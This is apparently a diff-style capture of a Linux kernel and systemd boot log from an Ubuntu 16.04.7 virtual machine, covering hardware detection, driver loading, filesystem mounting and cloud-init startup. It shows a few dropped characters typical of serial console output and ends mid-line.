-[ 0.000000] kvm-clock: Using msrs 4b564d01 and 4b564d00 -[ 0.000000] kvm-clock: cpu 0, msr 0:3ffe3001, primary cpu clock -[ 0.000000] kvm-clock: using sched offset of 3655493780 cycles -[ 0.000000] clocksource: kvm-clock: mask: 0xffffffffffffffff max_cycles: 0x1cd42e4dffb, max_idle_ns: 881590591483 ns -[ 0.000000] Zone ranges: -[ 0.000000] DMA [mem 0x0000000000001000-0x0000000000ffffff] -[ 0.000000] DMA32 [mem 0x0000000001000000-0x000000003ffeffff] -[ 0.000000] Normal empty -[ 0.000000] Device empty -[ 0.000000] Movable zone start for each node -[ 0.000000] Early memory node ranges -[ 0.000000] node 0: [mem 0x0000000000001000-0x000000000009efff] -[ 0.000000] node 0: [mem 0x0000000000100000-0x000000003ffeffff] -[ 0.000000] Initmem setup node 0 [mem 0x0000000000001000-0x000000003ffeffff] -[ 0.000000] ACPI: PM-Timer IO Port: 0x4008 -[ 0.000000] IOAPIC[0]: apic_id 2, version 32, address 0xfec00000, GSI 0-23 -[ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl) -[ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 low level) -[ 0.000000] Using ACPI (MADT) for SMP configuration information -[ 0.000000] smpboot: Allowing 2 CPUs, 0 hotplug CPUs -[ 0.000000] PM: Registered nosave memory: [mem 0x00000000-0x00000fff] -[ 0.000000] PM: Registered nosavememory: [mem 0x0009f000-0x0009ffff] -[ 0.000000] PM: Registered nosave memory: [mem 0x000a0000-0x000effff] -[ 0.000000] PM: Registered nosave memory: [mem 0x000f0000-0x000fffff] -[ 0.000000] e820: [mem 0x40000000-0xfebfffff] available for PCI devices -[ 0.000000] Booting paravirtualized kernel on KVM -[ 0.000000] clocksource: refined-jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645519600211568 ns -[ 0.000000] setup_percpu: NR_CPUS:512 nr_cpumask_bits:512 nr_cpu_ids:2 nr_node_ids:1 -[ 0.000000] PERCPU: Embedded 33 pages/cpu @ffff88003fc00000 s95512 r8192 d31464 u1048576 -[ 0.000000] Built 1 zonelists in Node order, mobility grouping on. Total pages: 257912 -[ 0.000000] Policy zone: DMA32 -[ 0.000000] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-4.4.0-190-generic root=LABEL=cloudimg-rootfs ro console=tty1 console=ttyS0 -[ 0.000000] PID hash table entries: 4096 (order: 3, 32768 bytes) -[ 0.000000] Memory: 997664K/1048120K available (8636K kernel code, 1337K rwdata, 4040K rodata, 1492K init, 1296K bss, 50456K reserved, 0K cma-rserved) -[ 0.000000] SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=2, Nodes=1 -[ 0.000000] Kernel/User page tables isolation: enabled -[ 0.000000] Hierarchical RCU implementation. -[ 0.000000] Build-time adjustment of leaf fanout to 64. -[ 0.000000] RCU restricting CPUs from NR_CPUS=512 to nr_cpu_ids=2. -[ 0.000000] RCU: Adjusting geometry for rcu_fanout_leaf=64, nr_cpu_ids=2 -[ 0.000000] NR_IRQS:33024 nr_irqs:440 16 -[ 0.000000] Console: colour VGA+ 80x25 -[ 0.000000] console [tty1] enabled -[ 0.000000] console [ttyS0] enabled -[ 0.000000] tsc: Detected 2207.998 MHz processor -[ 0.274840] Calibrating delay loop (skipped) preset value.. 4415.99 BogoMIPS (lpj=8831992) -[ 0.276771] pid_max: default: 32768 minimum: 301 -[ 0.277835] ACPI: Core revision 20150930 -[ 0.279978] ACPI: 2 ACPI AML tables successfully acquired and loaded -[ 0.292735] Security Framework initialized -[ 0.293736] Yama: becoming mindful. -[ 0.294616] AppArmor: AppArmor initialized -[ 0.295687] Dentry cache hash table entries: 131072 (order: 8, 1048576 bytes) -[ 0.297830] Inode-cache hash table entries: 65536 (order: 7, 524288 bytes) -[ 0.299357] Mount-cache hash table entries: 2048 (order: 2, 16384 bytes) -[ 0.300751] Mountpoint-cache hash table entries: 2048 (order: 2, 16384 bytes) -[ 0.307634] Initializing cgroup subsys io -[ 0.308590] Initializing cgroup subsys memory -[ 0.309685] Initializing cgroup subsys devices -[ 0.310727] Initializing cgroup subsys freezer -[ 0.311760] Initializing cgroup subsys net_cls -[ 0.312771] Initializing cgroup subsys perf_event -[ 0.313889] Initializing cgroup subsys net_prio -[ 0.314921] Initializing cgroup subsys hugetlb -[ 0.315939] Initializing cgroup subsys pids -[ 0.329902] mce: CPU supports 0 MCE banks -[ 0.330895] Last level iTLB entries: 4KB 64, 2MB 8, 4MB 8 -[ 0.332056] Last level dTLB entries: 4KB 64, 2MB 0, 4MB 0, 1GB 4 -[ 0.333328] Spectre V1 : Mitigation: usercopy/swapgs barriers and __user pointer sanitization -[ 0.335305] Spectre V2 : Mitigation: Full generic retpoline -[ 0.336512] Spectre V2 : Spectre v2 / SpectreRSB mitigation: Filling RSB on context switch -[ 0.338401] Speculative Store Bypass: Vulnerable -[ 0.339481] SRBDS: Unknown: Dependent on hypervisor status -[ 0.340764] MDS: Mitigation: Clear CPU buffers -[ 0.344522] Freeing SMP alternatives memory: 36K -[ 0.351833] ftrace: allocating 32339 entries in 127 pages -[ 0.419044] smpboot: APIC(0) Converting physical 0 to logical package 0 -[ 0.422966] smpboot: Max logical packages: 1 -[ 0.424391] x2apic enabled -[ 0.425479] Switched APIC routing to physical x2apic. -[ 0.431877] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=-1 pin2=-1 -[ 0.541221] smpboot: CPU0: Intel(R) Core(TM) i3-8130U CPU @ 2.20GHz (family: 0x6, model: 0x8e, stepping: 0xa) -[ 0.546217] Performance Events: unsupported p6 CPU model 142 no PMU driver, software events only. -[ 0.563789] KVM setup paravirtual spinlock -[ 0.572256] x86: Booting SMP configuration: -[ 0.574132] .... node #0, CPUs: #1 -[ 0.590311] kvm-clock: cpu 1, msr 0:3ffe3041, secondary cpu clock -[ 0.622013] mce: CPU supports 0 MCE banks -[ 0.640940] x86: Booted up 1 node, 2 CPUs -[ 0.642888] smpboot: Total of 2 processors activated (8831.99 BogoMIPS) -[ 0.650012] devtmpfs: initialized -[ 0.654301] evm: security.selinux -[ 0.655749] evm: security.SMACK64 -[ 0.657187] evm: security.SMACK64EXEC -[ 0.658693] evm: security.SMACK64TRANSMUTE -[ 0.660561] evm: security.SMACK64MMAP -[ 0.662178] evm: security.ima -[ 0.663438] evm: security.capability -[ 0.672821] clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645041785100000 ns -[ 0.676738] futex hash table entries: 512 (order: 3, 32768 bytes) -[ 0.684509] pinctrl core: initialized pinctrl subsystem -[ 0.687040] RTC time: 22:38:11, date: 01/25/21 -[ 0.690110] NET: Registered protocol family 16 -[ 0.700907] cpuidle: using governor ladder -[ 0.720872] cpuidle: using governor menu -[ 0.722981] PCCT header not found. -[ 0.726663] ACPI: bus type PCI registered -[ 0.728842] acpiphp: ACPI Hot Plug PCI Controller Driver version: 0.5 -[ 0.734723] PCI: Using configuration type 1 for base access -[ 0.753699] ACPI: Added _OSI(Module Device) -[ 0.762898] ACPI: Added _OSI(Processor Device) -[ 0.765017] ACPI: Added _OSI(3.0 _SCP Extensions) -[ 0.771041] ACPI: Added _OSI(Processor Aggregator Device) -[ 0.776232] ACPI: Executed 1 blocks of module-level executable AML code -[ 0.788018] ACPI: Interpreter enabled -[ 0.796269] ACPI: (supports S0 S5) -[ 0.814577] ACPI: Using IOAPIC for interrupt routing -[ 0.823529] PCI: Using host bridge windows from ACPI; if necessary, use "pci=nocrs" and report a bug -[ 0.844058] ACPI: PCI Root Bridge [PCI0] (domain 0000 [bus 00-ff]) -[ 0.848988] acpi PNP0A03:00: _OSC: OS supports [ASPM ClockPM Segments MSI] -[ 0.863442] acpi PNP0A03:00: _OSC: not requesting OS control; OS requires [ExtendedConfig ASPM ClockPM MSI] -[ 0.893828] acpi PNP0A03:00: fail to add MMCONFIG information, can't access extended PCI configuration space under this bridge. -[ 0.940775] PCI host bridge to bus 0000:00 -[ 0.968510] pci_bus 0000:00: root bus resource [io 0x0000-0x0cf7 window] -[ 1.006749] pci_bus 0000:00: root bus resource [io 0x0d00-0xffff window] -[ 1.016201] pci_bus 0000:00: root bus resource [mem 0x000a0000-0x000bffff window] -[ 1.034671] pci_bus 0000:00: root bus resource [mem 0x40000000-0xfdffffff window] -[ 1.053925] pci_bus 0000:00: root bus resource [bus 00-ff] -[ 1.062092] pci 0000:00:01.1: legacy IDE quirk: reg 0x10: [io 0x01f0-0x01f7] -[ 1.076315] pci 0000:00:01.1: legacy IDE quirk: reg 0x14: [io 0x03f6] -[ 1.102100] pci 0000:00:01.1: legacy IDE quirk: reg 0x18: [io 0x0170-0x0177] -[ 1.146885] pci 0000:00:01.1: legacy IDE quirk: reg 0x1c: [io 0x0376] -[ 1.202622] pci 0000:00:07.0: quirk: [io 0x4000-0x403f] claimed by PIIX4 ACPI -[ 1.206136] pci 0000:00:07.0: quirk: [io 0x4100-0x410f] claimed by PIIX4 SMB -[ 1.265106] ACPI: PCI Interrupt Link [LNKA] (IRQs 5 9 10 *11) -[ 1.273369] ACPI: PCI Interrupt Link [LNKB] (IRQs 5 9 *10 11) -[ 1.287769] ACPI: PCI Interrupt Link [LNKC] (IRQs 5 *9 10 11) -[ 1.312673] ACPI: PCI Interrupt Link [LNKD] (IRQs 5 9 10 *11) -[ 1.327479] ACPI: Enabled 2 GPEs in block 00 to 07 -[ 1.359304] vgaarb: setting as boot device: PCI:0000:00:02.0 -[ 1.364865] vgaarb: device added: PCI:0000:00:02.0,decodes=io+mem,owns=io+mem,locks=none -[ 1.392342] vgaarb: loaded -[ 1.395596] vgaarb: bridge control possible 0000:00:02.0 -[ 1.404698] SCSI subsystem initialized -[ 1.412261] ACPI: bus type USB registered -[ 1.420137] usbcore: registered new interface driver usbfs -[ 1.441918] usbcore: registered new interface driver hub -[ 1.445723] usbcore: registered new device driver usb -[ 1.466940] PCI: Using ACPI for IRQ routing -[ 1.472805] NetLabel: Initializing -[ 1.476097] NetLabel: domain hash size = 128 -[ 1.494592] NetLabel: protocols = UNLABELED CIPSOv4 -[ 1.516638] NetLabel: unlabeled traffic allowed by default -[ 1.552796] amd_nb: Cannot enumerate AMD northbridges -[ 1.577188] clocksource: Switched to clocksource kvm-clock -[ 1.606658] AppArmor AppArmor FilesysteEnabled -[ 1.804765] pnp: PnP ACPI ini -[ 1.868259] pnp: PnP ACPI: found 3 devices - -[ 1.887752] clocksource: acpi_pm: msk:0xffffff max_cycles: 0xffffff, max_idle_ns: 20857024 ns -[ 2.140897] NET: Regisered protocol family 2 - -[ 2.210657] TCP established hash table entries: 8192 (order: 4, 65536 bytes) -[ 2.223067] TCP bind hash table entries: 8192 (order: 5, 131072 bytes) -[ 2.224722] TCP: ash tables configured (established 8192 bind 8192) -[ 2.304118] UDP hash table entries: 512 (order: 2, 16384 bytes) -[ 2.344935] UDP-Lite hash table entries: 512 (order: 2, 16384 byts) -[ 2.410724] NET: Registered protocol family 1 -[ 2.414911] pci 0000:00:00.0: Limiting direct PCI/PCI transfers -[ 2.416292] pci 0000:00:01.0: Activating ISA DMA hang workarunds -[ 494145] Unpacking initramfs... - -[ 3.205804] Freeing initrd memory: 14880K -[ 3.207790] clocksource: tsc: mask: 0xffffffffffffffff max_cycles: 0x1fd3b6211b4, max_idle_ns: 440795230313 ns -[ 3.223716] platform rtc_cmos: registered platform RTC device (no PNP device found) -[ 3.227245] Scanning for low memory corruption every 60 seconds -[ 3.243621] audit: initializing netlink subsys (disabled) -[ 3.246080] audit: type=2000 audit(1611614298.677:1): initialized -[ 3.252534] Initialise system trusted keyring -[ 3.255117] HugeTLB registered 2 MB page size, pre-allocated 0 pages -[ 3.266326] zbud: loaded -[ 3.268069] VFS: Disk quotas dquot_6.6.0 -[ 3.270169] VFS: Dquot-cache hash table entries: 512 (order 0, 4096 bytes) -[ 3.278836] squashfs: version 4.0 (2009/01/31) Phillip Lougher -[ 3.281752] fuse init (API version 7.23) -[ 3.284812] Key type big_key registered -[ 3.288545] Allocating IMA MOK and blacklist keyrings. -[ 3.315763] Key type asymmetric registered -[ 3.331251] Asymmetric key parser 'x509' registered -[ 3.333455] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 249) -[ 3.346327] io scheduler noop registered -[ 3.348172] io scheduler deadline registered (default) -[ 3.354152] io scheduler cfq registered -[ 3.355956] pci_hotplug: PCI Hot Plug PCI Core version: 0.5 -[ 3.358614] pciehp: PCI Express Hot Plug Controller Driver version: 0.4 -[ 3.364977] ACPI: AC Adapter [AC] (on-line) -[ 3.366673] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input0 -[ 3.373695] ACPI: Power Button [PWRF] -[ 3.376880] input: Sleep Button as /devices/LNXSYSTM:00/LNXSLPBN:00/input/input1 -[ 3.382417] ACPI: Sleep Button [SLPF] -[ 3.391051] ACPI: Battery Slot [BAT0] (battery present) -[ 3.393440] GHES: HEST is not enabled! -[ 3.395433] Serial: 8250/16550 driver, 32 ports, IRQ sharing enabled -[ 3.420440] 00:02: ttyS0 at I/O 0x3f8 (irq = 4, base_baud = 115200) is a 16550A -[ 3.424912] Linux agpgart interface v0.103 -[ 3.437937] loop: module loaded -[ 3.443153] scsi host0: ata_piix -[ 3.444738] scsi host1: ata_piix -[ 3.446189] ata1: PATA max UDMA/33 cmd 0x1f0 ctl 0x3f6 bmdma 0xd000 irq 14 -[ 3.449270] ata2: PATA max UDMA/33 cmd 0x170 ctl 0x376 bmdma 0xd008 irq 15 -[ 3.457147] libphy: Fixed MDIO Bus: probed -[ 3.459147] tun: Universal TUN/TAP device driver, 1.6 -[ 3.461132] tun: (C) 1999-2004 Max Krasnyansky -[ 3.463570] PPP generic driver version 2.4.2 -[ 3.465417] ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver -[ 3.468106] ehci-pci: EHCI PCI platform driver -[ 3.469931] ehci-platform: EHCI generic platform driver -[ 3.472088] ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver -[ 3.474124] ohci-pci: OHCI PCI platform driver -[ 3.475638] ohci-platform: OHCI generic platform driver -[ 3.477666] uhci_hcd: USB Universal Host Controller Interface driver -[ 3.480279] i8042: PNP: PS/2 Controller [PNP0303:PS2K,PNP0f03:PS2M] at 0x60,0x64 irq 1,12 -[ 3.487313] serio: i8042 KBD port at 0x60,0x64 irq 1 -[ 3.489184] serio: i8042 AUX port at 0x60,0x64 irq 12 -[ 3.491201] mousedev: PS/2 mouse device common for all mice -[ 3.500245] rtc_cmos rtc_cmos: rtc core: registered rtc_cmos as rtc0 -[ 3.502777] rtc_cmos rtc_cmos: alarms up to one day, 114 bytes nvram -[ 3.505087] i2c /dev entries driver -[ 3.509845] device-mapper: uevent: version 1.0.3 -[ 3.511765] device-mapper: ioctl: 4.34.0-ioctl (2015-10-28) initialised: dm-devel@redhat.com -[ 3.515048] ledtrig-cpu: registered to indicate activity on CPUs -[ 3.516279] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input2 -[ 3.523176] NET: Registered protocol family 10 -[ 3.526956] NET: Registered protocol family 17 -[ 3.528678] Key type dns_resolver registered -[ 3.530800] registered taskstats version 1 -[ 3.532445] Loading compiled-in X.509 certificates -[ 3.534962] Loaded X.509 cert 'Build time autogenerated kernel key: b89e9ea735e1dbde81c7786f041ecf1d53e71c2e' -[ 3.538748] zswap: loaded using pool lzo/zbud -[ 3.548785] Key type trusted registered -[ 3.555688] Key type encrypted registered -[ 3.557363] AppArmor: AppArmor sha1 policy hashing enabled -[ 3.559421] ima: No TPM chip found, activating TPM-bypass! -[ 3.561563] ima: Allocated hash algorithm: sha1 -[ 3.563383] evm: HMAC attrs: 0x1 -[ 3.566978] Magic number: 5:763:654 -[ 3.568573] rtc_cmos rtc_cmos: setting system clock to 2021-01-25 22:38:14 UTC (1611614294) -[ 3.575511] BIOS EDD facility v0.16 2004-Jun-25, 0 devices found -[ 3.577916] EDD information not available. -[ 3.621140] Freeing unused kernel memory: 1492K -[ 3.628240] Write protecting the kernel read-only data: 14336k -[ 3.630905] Freeing unused kernel memory: 1592K -[ 3.637366] Freeing unused kernel memory: 56K -Loading, please wait... -starting version 229 -[ 3.666999] random: udevadm: uninitialized urandom read (16 bytes read, 3 bits of entropy available) -[ 3.667523] random: systemd-udevd: uninitialized urandom read (16 bytes read, 3 bits of entropy available) -[ 3.667614] random: systemd-udevd: uninitialized urandom read (16 bytes read, 3 bits of entropy available) -[ 3.667636] random: systemd-udevd: uninitialized urandom read (16 bytes read, 3 bits of entropy available) -[ 3.667661] random: systemd-udevd: uninitialized urandom read (16 bytes read, 3 bits of entropy available) -[ 3.689344] random: udevadm: uninitialized urandom read (16 bytes read, 3 bits of entropy available) -[ 3.702111] random: systemd-udevd: uninitialized urandom read (16 bytes read, 3 bits of entropy available) -[ 3.716180] random: udevadm: uninitialized urandom read (16 bytes read, 3 bits of entropy available) -[ 3.716244] random: udevadm: uninitialized urandom read (16 bytes read, 3 bits of entropy available) -[ 3.716407] random: udevadm: uninitialized urandom read (16 bytes read, 3 bits of entropy available) -[ 4.002861] e1000: Intel(R) PRO/1000 Network Driver - version 7.3.21-k8-NAPI -[ 4.016393] e1000: Copyright (c) 1999-2006 Intel Corporation. -[ 4.039783] Fusion MPT base driver 3.04.20 -[ 4.046033] Copyright (c) 1999-2008 LSI Corporation -[ 4.099773] Fusion MPT SPI Host driver 3.04.20 -[ 4.117707] AVX2 version of gcm_enc/dec engaged. -[ 4.121558] AES CTR mode by8 optimization enabled -[ 4.435411] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input4 -[ 5.230251] e1000 0000:00:03.0 eth0: (PCI:33MHz:32-bit) 02:83:3c:85:18:ff -[ 5.235481] e1000 0000:00:03.0 eth0: Intel(R) PRO/1000 Network Connection -[ 6.216961] e1000 0000:00:08.0 eth1: (PCI:33MHz:32-bit) 08:00:27:24:a8:61 -[ 6.222149] e1000 0000:00:08.0 eth1: Intel(R) PRO/1000 Network Connection -[ 6.236751] mptbase: ioc0: Initiating bringup -[ 6.301432] ioc0: LSI53C1030 A0: Capabilities={Initiator} -[ 6.462564] scsi host2: ioc0: LSI53C1030 A0, FwRev=00000000h, Ports=1, MaxQ=256, IRQ=20 -[ 6.576699] scsi 2:0:0:0: Direct-Access VBOX HARDDISK 1.0 PQ: 0 ANSI: 5 -[ 6.578396] scsi target2:0:0: Beginning Domain Validation -[ 6.581996] scsi target2:0:0: Domain Validation skipping write tests -[ 6.584900] scsi target2:0:0: Ending Domain Validation -[ 6.588367] scsi target2:0:0: asynchronous -[ 6.594895] scsi 2:0:1:0: Direct-Access VBOX HARDDISK 1.0 PQ: 0 ANSI: 5 -[ 6.597172] scsi target2:0:1: Beginning Domain Validation -[ 6.605994] scsi target2:0:1: Domain Validation skipping write tests -[ 6.639483] scsi target2:0:1: Ending Domain Validation -[ 6.646477] scsi target2:0:1: asynchronous -[ 6.666810] sd 2:0:0:0: Attached scsi generic sg0 type 0 -[ 6.669347] sd 2:0:0:0: [sda] 20971520 512-byte logical blocks: (10.7 GB/10.0 GiB) -[ 6.669787] sd 2:0:0:0: [sda] Write Protect is off -[ 6.669855] sd 2:0:0:0: [sda] Incomplete mode parameter data -[ 6.669856] sd 2:0:0:0: [sda] Assuming drive cache: write through -[ 6.699332] sd 2:0:1:0: Attached scsi generic sg1 type 0 -[ 6.703973] sd 2:0:1:0: [sdb] 20480 512-byte logical blocks: (10.5 MB/10.0 MiB) -[ 6.711201] sd 2:0:1:0: [sdb] Write Protect is off -[ 6.714802] sd 2:0:1:0: [sdb] Incomplete mode parameter data -[ 6.716823] sd 2:0:1:0: [sdb] Assuming drive cache: write through -[ 6.718974] sda: sda1 -[ 6.744441] sd 2:0:0:0: [sda] Attached SCSI disk -[ 6.750830] sd 2:0:1:0: [sdb] Attached SCSI disk -[ 7.242079] e1000 0000:00:09.0 eth2: (PCI:33MHz:32-bit) 08:00:27:53:ea:3b -[ 7.286736] e1000 0000:00:09.0 eth2: Intel(R) PRO/1000 Network Connection -[ 8.235376] e1000 0000:00:0a.0 eth3: (PCI:33MHz:32-bit) 08:00:27:55:78:35 -[ 8.249572] e1000 0000:00:0a.0 eth3: Intel(R) PRO/1000 Network Connection -[ 8.258423] e1000 0000:00:08.0 enp0s8: renamed from eth1 -[ 8.273173] e1000 0000:00:09.0 enp0s9: renamed from eth2 -[ 8.305666] e1000 0000:00:0a.0 enp0s10: renamed from eth3 -[ 8.353299] e1000 0000:00:03.0 enp0s3: renamed from eth0 -Begin: Loading essential drivers ... [ 9.856101] md: linear personality registered for level -1 -[ 9.881795] md: multipath personality registered for level -4 -[ 9.909534] md: raid0 personality registered for level 0 -[ 9.939832] md: raid1 personality registered for level 1 -[ 10.033279] raid6: sse2x1 gen() 7248 MB/s -[ 10.101537] raid6: sse2x1 xor() 5652 MB/s -[ 10.181633] raid6: sse2x2 gen() 10162 MB/s -[ 10.257606] raid6: sse2x2 xor() 7148 MB/s -[ 10.374160] raid6: sse2x4 gen() 6331 MB/s -[ 10.453660] raid6: sse2x4 xor() 3059 MB/s -[ 10.521711] raid6: avx2x1 gen() 12043 MB/s -[ 10.609745] raid6: avx2x2 gen() 14404 MB/s -[ 10.677670] raid6: avx2x4 gen() 14940 MB/s -[ 10.682351] raid6: using algorithm avx2x4 gen() 14940 MB/s -[ 10.706372] raid6: using avx2x2 recovery algorithm -[ 10.722623] xor: automatically using best checksumming function: -[ 10.778959] avx : 15586.000 MB/sec -[ 10.808989] async_tx: api initialized (async) -[ 10.913738] md: raid6 personality registered for level 6 -[ 10.917294] md: raid5 personality registered for level 5 -[ 10.919810] md: raid4 personality registered for level 4 -[ 10.971521] md: raid10 personality registered for level 10 -done. -Begin: Running /scripts/init-premount ... done. -Begin: Mounting root file system ... Begin: Running /scripts/local-top ... done. -Begin: Running /scripts/local-premount ... [ 11.154926] Btrfs loaded -Scanning for Btrfs filesystems -done. -Warning: fsck not present, so skipping root file system -[ 11.251414] EXT4-fs (sda1): INFO: recovery required on readonly filesystem -[ 11.255357] EXT4-fs (sda1): write access will be enabled during recovery -[ 11.296705] EXT4-fs (sda1): recovery complete -[ 11.307423] EXT4-fs (sda1): mounted filesystem with ordered data mode. Opts: (null) -done. -Begin: Running /scripts/local-bottom ... done. -Begin: Running /scripts/init-bottom ... done. -[ 11.638653] systemd[1]: systemd 229 running in system mode. (+PAM +AUDIT +SELINUX +IMA +APPARMOR +SMACK +SYSVINIT +UTMP +LIBCRYPTSETUP +GCRYPT +GNUTLS +ACL +XZ -LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD -IDN) -[ 11.653630] systemd[1]: Detected virtualization oracle. -[ 11.672725] systemd[1]: Detected architecture x86-64. - -Welcome to Ubuntu 16.04.7 LTS! - -[ 11.697732] systemd[1]: Set hostname to . -[ 11.983572] random: nonblocking pool is initialized -[ 12.107560] systemd[1]: Listening on LVM2 poll daemon socket. -[ OK ] Listening on LVM2 poll daemon socket. -[ 12.150801] systemd[1]: Reached target Swap. -[ OK ] Reached target Swap. -[ 12.189894] systemd[1]: Created slice User and Session Slice. -[ OK ] Created slice User and Session Slice. -[ 12.195207] systemd[1]: Listening on udev Control Socket. -[ OK ] Listening on udev Control Socket. -[ 12.239799] systemd[1]: Listening on LVM2 metadata daemon socket. -[ OK ] Listening on LVM2 metadata daemon socket. -[ 12.280694] systemd[1]: Reached target User and Group Name Lookups. -[ OK ] Reached target User and Group Name Lookups. -[ 12.324079] systemd[1]: Created slice System Slice. -[ OK ] Created slice System Slice. -[ 12.343245] systemd[1]: Reached target System Time Synchronized. -[ OK ] Reached target System Time Synchronized. -[ 12.373838] systemd[1]: Created slice system-serial\x2dgetty.slice. -[ OK ] Created slice system-serial\x2dgetty.slice. -[ 12.465546] systemd[1]: Set up automount Arbitrary Executable File Formats File System Automount Point. -[ OK ] Set up automount Arbitrary Executab...ats File System Automount Point. -[ 12.471963] systemd[1]: Reached target Encrypted Volumes. -[ OK ] Reached target Encrypted Volumes. -[ 12.512954] systemd[1]: Listening on Journal Audit Socket. -[ OK ] Listening on Journal Audit Socket. -[ 12.549459] systemd[1]: Listening on Journal Socket. -[ OK ] Listening on Journal Socket. -[ 12.581353] systemd[1]: Starting Nameserver information manager... - Starting Nameserver information manager... -[ 12.609504] systemd[1]: Starting Create list of required static device nodes for the current kernel... - Starting Create list of required st... nodes for the current kernel... -[ 12.661361] systemd[1]: Mounting POSIX Message Queue File System... - Mounting POSIX Message Queue File System... -[ 12.705449] systemd[1]: Starting Uncomplicated firewall... - Starting Uncomplicated firewall... -[ 12.793345] systemd[1]: Mounting Huge Pages File System... - Mounting Huge Pages File System... -[ 12.849436] systemd[1]: Starting Remount Root and Kernel File Systems... -[ 12.859219] EXT4-fs (sda1): re-mounted. Opts: (null) - Starting Remount Root and Kernel File Systems... -[ 12.964610] systemd[1]: Listening on /dev/initctl Compatibility Named Pipe. -[ OK ] Listening on /dev/initctl Compatibility Named Pipe. -[ 12.996278] systemd[1]: Listening on Device-mapper event daemon FIFOs. -[ OK ] Listening on Device-mapper event daemon FIFOs. -[ 13.043153] systemd[1]: Starting Set console keymap... - Starting Set console keymap... -[ 13.059298] systemd[1]: Listening on Journal Socket (/dev/log). -[ OK ] Listening on Journal Socket (/dev/log). -[ 13.141326] systemd[1]: Mounting Debug File System... - Mounting Debug File System... -[ 13.197988] systemd[1]: Starting Monitoring of LVM2 mirrors, snapshots etc. using dmeventd or progress polling... - Starting Monitoring of LVM2 mirrors... dmeventd or progress polling... -[ 13.238803] systemd[1]: Started Trigger resolvconf update for networkd DNS. -[ OK ] Started Trigger resolvconf update for networkd DNS. -[ 13.277553] systemd[1]: Listening on Syslog Socket. -[ OK ] Listening on Syslog Socket. -[ 13.321451] systemd[1]: Listening on udev Kernel Socket. -[ OK ] Listening on udev Kernel Socket. -[ 13.413436] systemd[1]: Starting Load Kernel Modules... - Starting Load Kernel Modules... -[ 13.432529] systemd[1]: Started Forward Password Requests to Wall Directory Watch. -[ OK [[ 13.455009] Loading iSCSI transport class v2.0-870. -0m] Started Forward Password Requests to Wall Directory Watch. -[ 13.502488] systemd[1]: Starting Journal Service... - Starting Journal Service... -[ 13.564601] systemd[1]: Reached target Slices. -[ 13.585816] iscsi: regisred transport (tcp) - -[ OK ] Reached target Slices. -[ 13.858967] systemd[1]: Mounted Debug File System. -[ OK ] Mounted Debug File System. -[ 13.882835] systemd[1]: Mounted Huge Pages File System. -[ OK ] Mounted Huge Pages File System. -[ 13.962334] systemd[1]: Mounted POSIX Message Queue File System. -[ OK ] Mounted POSIX Message Queue File System. -[ 14.003931] systemd[1]: Started Journal Service. -[ OK ] Started Journal Service. -[ 14.085969] iscsi: registered transport (iser) -[ OK ] Started Create list of required sta...ce nodes for the current kernel. -[ OK ] Started Uncomplicated firewall. -[ OK ] Started Remount Root and Kernel File Systems. -[ OK ] Started Set console keymap. -[ OK ] Started Load Kernel Modules. -[ OK ] Started Nameserver information manager. -[ OK ] Started LVM2 metadata daemon. - Starting Apply Kernel Variables... - Mounting FUSE Control File System... - Starting Load/Save Random Seed... - Starting udev Coldplug all Devices... - Starting Create Static Device Nodes in /dev... - Starting Flush Journal to Persistent Storage... -[ OK ] Mounted FUSE Control File System. -[ OK ] Started Apply Kernel Variables. -[ OK ] Started Load/Save Random Seed. -[ OK ] Started Create Static Device Nodes in /dev. - Starting udev Kernel Device Manager... -[ OK ] Started udev Coldplug all Devices. -[ OK ] Started udev Kernel Device Manager. -[ OK ] Started Flush Journal to Persistent Storage. -[ OK ] Started Monitoring of LVM2 mirrors,...ng dmeventd or progress polling. -[ OK ] Reached target Local File Systems (Pre). -[ OK ] Reached target Local File Systems. - Starting Set console font and keymap... - Starting Tell Plymouth To Write Out Runtime Data... - Starting Initial cloud-init job (pre-networking)... - Starting LSB: AppArmor initialization... - Starting Create Volatile Files and Directories... -[ OK ] Started Dispatch Password Requests to Console Directory Watch. -[ OK ] Started Tell Plymouth To Write Out Runtime Data. -[ OK ] Started Create Volatile Files and Directories. - Starting Update UTMP about System Boot/Shutdown... -[ OK ] Started Update UTMP about System Boot/Shutdown. -[ OK ] Found device /dev/ttyS0. -[ OK ] Started LSB: AppArmor initialization. -[ OK ] Listening on Load/Save RF Kill Switch Status /dev/rfkill Watch. - Starting Load AppArmor profiles managed internally by snapd... -[ OK ] Started Set console font and keymap. -[ OK ] Started Load AppArmor profiles managed internally by snapd. -[ OK ] Found device 82540EM Gigabit Ethern...r (PRO/1000 MT Desktop Adapter). -[ OK ] Found device 82540EM Gigabit Ethern...r (PRO/1000 MT Desktop Adapter). -[ OK ] Found device 82540EM Gigabit Ethern...r (PRO/1000 MT Desktop Adapter). -[ OK ] Created slice system-getty.slice. -[ 19.540070] cloud-init[498]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'init-local' at Mon, 25 Jan 2021 22:38:30 +0000. Up 18.27 seconds. -[ OK ] Started Initial cloud-init job (pre-networking). -[ OK ] Reached target Network (Pre). -[ OK ] Started ifup for enp0s9. -[ OK ] Started ifup for enp0s8. - Starting Raise network interfaces... -[ OK ] Started ifup for enp0s10. -[ OK ] Started ifup for enp0s3. -[ OK ] Started Raise network interfaces. - Starting Initial cloud-init job (metadata service crawler)... -[ OK ] Reached target Network. -[ 22.456521] cloud-init[1316]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'init' at Mon, 25 Jan 2021 22:38:33 +0000. Up 21.61 seconds. -[ 22.462634] cloud-init[1316]: ci-info: +++++++++++++++++++++++++++++++++++++++Net device 